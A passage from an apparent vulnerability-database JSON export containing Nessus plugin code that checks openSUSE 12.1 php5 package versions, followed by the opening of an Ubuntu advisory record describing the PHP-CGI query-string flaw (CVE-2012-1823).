script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debugsource-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-devel-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dom-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dom-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fastcgi-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fastcgi-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pear-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-phar-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-phar-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-debuginfo-5.3.8-4.15.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T07:15:15", "description": "It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2012-05-07T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1437-1.NASL", "href": "https://www.tenable.com/plugins/nessus/59016", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1437-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59016);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"USN\", value:\"1437-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n 